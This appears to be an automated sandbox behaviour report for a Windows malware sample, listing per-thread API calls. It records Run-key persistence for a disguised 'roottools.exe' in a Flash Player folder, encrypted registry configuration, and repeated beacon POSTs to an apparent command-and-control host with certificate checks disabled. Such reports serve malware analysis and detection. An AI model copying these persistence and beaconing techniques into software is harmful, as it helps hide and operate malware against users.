Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
For performance reasons, the remaining 1657 entries are omitted.
The remaining entries can be found in glog.xml.
Thread 0x74c
(Host: 8, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 14
Fn
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x548
(Host: 32, Network: 22)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:59:09 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close a ü@, url = aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA False 1
Fn
Inet Send HTTP Request headers = Connection: close a ü@, url = aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 192 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:59:10 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close t ¤A, url = aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ False 1
Fn
Inet Send HTTP Request headers = Connection: close t ¤A, url = aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 192 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Thread 0x7d8
(Host: 3051, Network: 120)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:59:09 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close _ æ@, url = aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ False 1
Fn
Inet Send HTTP Request headers = Connection: close _ æ@, url = aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 192 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:59:10 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close d°é@, url = aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg False 1
Fn
Inet Send HTTP Request headers = Connection: close d°é@, url = aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 192 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:59:10 (UTC) True 1
Fn
